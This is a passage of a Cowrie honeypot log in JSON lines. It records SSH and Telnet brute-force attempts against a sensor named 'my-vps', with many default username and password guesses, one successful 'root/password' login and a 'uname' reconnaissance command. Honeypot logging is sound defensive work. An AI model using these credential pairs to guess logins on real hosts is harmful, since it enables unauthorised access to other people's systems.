mac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:30:27.311956Z","src_ip":"103.59.95.12","session":"135adf46f97e"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123","message":"login attempt [mysql/123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:30:28.397145Z","src_ip":"103.59.95.12","session":"135adf46f97e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:30:29.657732Z","src_ip":"103.59.95.12","session":"135adf46f97e"}
{"eventid":"cowrie.session.connect","src_ip":"222.102.214.75","src_port":34941,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f191530b00c","protocol":"ssh","message":"New connection: 222.102.214.75:34941 (1.2.3.4:22) [session: 4f191530b00c]","sensor":"my-vps","timestamp":"2025-09-09T04:31:16.497584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_6.0p2 Debian-4+deb7u2","message":"Remote SSH version: SSH-2.0-OpenSSH_6.0p2 Debian-4+deb7u2","sensor":"my-vps","timestamp":"2025-09-09T04:31:16.817379Z","src_ip":"222.102.214.75","session":"4f191530b00c"}
{"eventid":"cowrie.client.kex","hassh":"9d31b8e6c87f893d077ca6526f7c710b","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256;aes128-ctr;hmac-sha1,hmac-256,hmac-sha2-256;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr"],"macCS":["hmac-sha1","hmac-256","hmac-sha2-256"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 9d31b8e6c87f893d077ca6526f7c710b","sensor":"my-vps","timestamp":"2025-09-09T04:31:17.138652Z","src_ip":"222.102.214.75","session":"4f191530b00c"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234","message":"login attempt [user/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:31:18.597516Z","src_ip":"222.102.214.75","session":"4f191530b00c"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-09-09T04:31:20.261181Z","src_ip":"222.102.214.75","session":"4f191530b00c"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T04:31:21.907222Z","src_ip":"222.102.214.75","session":"4f191530b00c"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:31:23.426976Z","src_ip":"222.102.214.75","session":"4f191530b00c"}
{"eventid":"cowrie.session.connect","src_ip":"222.102.214.75","src_port":35077,"dst_ip":"1.2.3.4","dst_port":22,"session":"76827d494c79","protocol":"ssh","message":"New connection: 222.102.214.75:35077 (1.2.3.4:22) [session: 76827d494c79]","sensor":"my-vps","timestamp":"2025-09-09T04:31:23.750259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_6.0p2 Debian-4+deb7u2","message":"Remote SSH version: SSH-2.0-OpenSSH_6.0p2 Debian-4+deb7u2","sensor":"my-vps","timestamp":"2025-09-09T04:31:24.074957Z","src_ip":"222.102.214.75","session":"76827d494c79"}
{"eventid":"cowrie.client.kex","hassh":"9d31b8e6c87f893d077ca6526f7c710b","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256;aes128-ctr;hmac-sha1,hmac-256,hmac-sha2-256;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr"],"macCS":["hmac-sha1","hmac-256","hmac-sha2-256"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 9d31b8e6c87f893d077ca6526f7c710b","sensor":"my-vps","timestamp":"2025-09-09T04:31:24.397596Z","src_ip":"222.102.214.75","session":"76827d494c79"}
{"eventid":"cowrie.login.failed","username":"sFTPUser","password":"sFTPUser","message":"login attempt [sFTPUser/sFTPUser] failed","sensor":"my-vps","timestamp":"2025-09-09T04:31:26.081713Z","src_ip":"222.102.214.75","session":"76827d494c79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51877,"dst_ip":"1.2.3.4","dst_port":23,"session":"12c3bab9569e","protocol":"telnet","message":"New connection: 212.227.125.160:51877 (1.2.3.4:23) [session: 12c3bab9569e]","sensor":"my-vps","timestamp":"2025-09-09T04:31:26.199378Z"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:31:27.520476Z","src_ip":"222.102.214.75","session":"76827d494c79"}
{"eventid":"cowrie.session.connect","src_ip":"222.102.214.75","src_port":35132,"dst_ip":"1.2.3.4","dst_port":22,"session":"e53db26d1cd2","protocol":"ssh","message":"New connection: 222.102.214.75:35132 (1.2.3.4:22) [session: e53db26d1cd2]","sensor":"my-vps","timestamp":"2025-09-09T04:31:27.854585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_6.0p2 Debian-4+deb7u2","message":"Remote SSH version: SSH-2.0-OpenSSH_6.0p2 Debian-4+deb7u2","sensor":"my-vps","timestamp":"2025-09-09T04:31:28.184638Z","src_ip":"222.102.214.75","session":"e53db26d1cd2"}
{"eventid":"cowrie.client.kex","hassh":"9d31b8e6c87f893d077ca6526f7c710b","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256;aes128-ctr;hmac-sha1,hmac-256,hmac-sha2-256;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr"],"macCS":["hmac-sha1","hmac-256","hmac-sha2-256"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 9d31b8e6c87f893d077ca6526f7c710b","sensor":"my-vps","timestamp":"2025-09-09T04:31:28.513503Z","src_ip":"222.102.214.75","session":"e53db26d1cd2"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":40696,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f51109cf45f","protocol":"ssh","message":"New connection: 154.209.4.55:40696 (1.2.3.4:22) [session: 9f51109cf45f]","sensor":"my-vps","timestamp":"2025-09-09T04:31:29.817883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:31:29.826997Z","src_ip":"154.209.4.55","session":"9f51109cf45f"}
{"eventid":"cowrie.login.failed","username":"Epuser","password":"Epuser","message":"login attempt [Epuser/Epuser] failed","sensor":"my-vps","timestamp":"2025-09-09T04:31:29.998036Z","src_ip":"222.102.214.75","session":"e53db26d1cd2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:31:30.032325Z","src_ip":"154.209.4.55","session":"9f51109cf45f"}
{"eventid":"cowrie.session.closed","duration":4.570621967315674,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:31:30.769928Z","src_ip":"212.227.125.160","session":"12c3bab9569e"}
{"eventid":"cowrie.login.failed","username":"boris","password":"1234567","message":"login attempt [boris/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T04:31:30.863098Z","src_ip":"154.209.4.55","session":"9f51109cf45f"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:31:31.595694Z","src_ip":"222.102.214.75","session":"e53db26d1cd2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:31:32.078123Z","src_ip":"154.209.4.55","session":"9f51109cf45f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":29228,"dst_ip":"1.2.3.4","dst_port":22,"session":"f28ee7a73924","protocol":"ssh","message":"New connection: 212.227.235.229:29228 (1.2.3.4:22) [session: f28ee7a73924]","sensor":"my-vps","timestamp":"2025-09-09T04:31:46.362105Z"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:31:47.346568Z","src_ip":"212.227.235.229","session":"f28ee7a73924"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61588,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7eb7486d296","protocol":"ssh","message":"New connection: 212.227.235.229:61588 (1.2.3.4:22) [session: f7eb7486d296]","sensor":"my-vps","timestamp":"2025-09-09T04:31:47.577410Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:31:48.407362Z","src_ip":"212.227.235.229","session":"3b5c6980c121"}
{"eventid":"cowrie.session.closed","duration":180.27840566635132,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:31:48.411870Z","src_ip":"212.227.235.229","session":"3b5c6980c121"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:31:49.047319Z","src_ip":"212.227.235.229","session":"f7eb7486d296"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T04:31:49.048227Z","src_ip":"212.227.235.229","session":"f7eb7486d296"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T04:31:50.021106Z","src_ip":"212.227.235.229","session":"f7eb7486d296"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:31:51.264842Z","src_ip":"212.227.235.229","session":"f7eb7486d296"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61594,"dst_ip":"1.2.3.4","dst_port":22,"session":"82aab9f3205e","protocol":"ssh","message":"New connection: 212.227.235.229:61594 (1.2.3.4:22) [session: 82aab9f3205e]","sensor":"my-vps","timestamp":"2025-09-09T04:31:51.505163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:31:51.506290Z","src_ip":"212.227.235.229","session":"82aab9f3205e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T04:31:51.748176Z","src_ip":"212.227.235.229","session":"82aab9f3205e"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-09T04:31:53.369628Z","src_ip":"212.227.235.229","session":"82aab9f3205e"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:31:54.612668Z","src_ip":"212.227.235.229","session":"82aab9f3205e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61606,"dst_ip":"1.2.3.4","dst_port":22,"session":"62775fd59814","protocol":"ssh","message":"New connection: 212.227.235.229:61606 (1.2.3.4:22) [session: 62775fd59814]","sensor":"my-vps","timestamp":"2025-09-09T04:31:54.882238Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:31:54.885518Z","src_ip":"212.227.235.229","session":"62775fd59814"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":34228,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a0f8219af58","protocol":"ssh","message":"New connection: 103.59.95.12:34228 (1.2.3.4:22) [session: 3a0f8219af58]","sensor":"my-vps","timestamp":"2025-09-09T04:31:56.633906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:31:56.635514Z","src_ip":"103.59.95.12","session":"3a0f8219af58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:31:56.888226Z","src_ip":"103.59.95.12","session":"3a0f8219af58"}
{"eventid":"cowrie.login.failed","username":"db2admin","password":"password1","message":"login attempt [db2admin/password1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:31:57.952161Z","src_ip":"103.59.95.12","session":"3a0f8219af58"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:31:59.210839Z","src_ip":"103.59.95.12","session":"3a0f8219af58"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":53826,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a5901a01df1","protocol":"ssh","message":"New connection: 102.68.86.62:53826 (1.2.3.4:22) [session: 8a5901a01df1]","sensor":"my-vps","timestamp":"2025-09-09T04:32:03.128066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:32:03.128734Z","src_ip":"102.68.86.62","session":"8a5901a01df1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:32:03.297559Z","src_ip":"102.68.86.62","session":"8a5901a01df1"}
{"eventid":"cowrie.login.failed","username":"boris","password":"1234567","message":"login attempt [boris/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T04:32:04.011697Z","src_ip":"102.68.86.62","session":"8a5901a01df1"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:32:05.183084Z","src_ip":"102.68.86.62","session":"8a5901a01df1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T04:32:12.737253Z","src_ip":"212.227.235.229","session":"62775fd59814"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:32:14.348561Z","src_ip":"212.227.235.229","session":"62775fd59814"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:32:15.510503Z","src_ip":"212.227.235.229","session":"62775fd59814"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-09-09T04:32:15.511394Z","src_ip":"212.227.235.229","session":"62775fd59814"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:32:15.773196Z","src_ip":"212.227.235.229","session":"62775fd59814"}
{"eventid":"cowrie.session.closed","duration":"20.9","message":"Connection lost after 20.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:32:15.774499Z","src_ip":"212.227.235.229","session":"62775fd59814"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":47896,"dst_ip":"1.2.3.4","dst_port":22,"session":"f02b6aeed630","protocol":"ssh","message":"New connection: 92.118.39.62:47896 (1.2.3.4:22) [session: f02b6aeed630]","sensor":"my-vps","timestamp":"2025-09-09T04:32:34.099283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:32:34.100156Z","src_ip":"92.118.39.62","session":"f02b6aeed630"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T04:32:34.130748Z","src_ip":"92.118.39.62","session":"f02b6aeed630"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:32:34.224344Z","src_ip":"92.118.39.62","session":"f02b6aeed630"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:32:35.257213Z","src_ip":"92.118.39.62","session":"f02b6aeed630"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":53503,"dst_ip":"1.2.3.4","dst_port":22,"session":"09708e882460","protocol":"ssh","message":"New connection: 154.209.4.55:53503 (1.2.3.4:22) [session: 09708e882460]","sensor":"my-vps","timestamp":"2025-09-09T04:32:37.538915Z"}
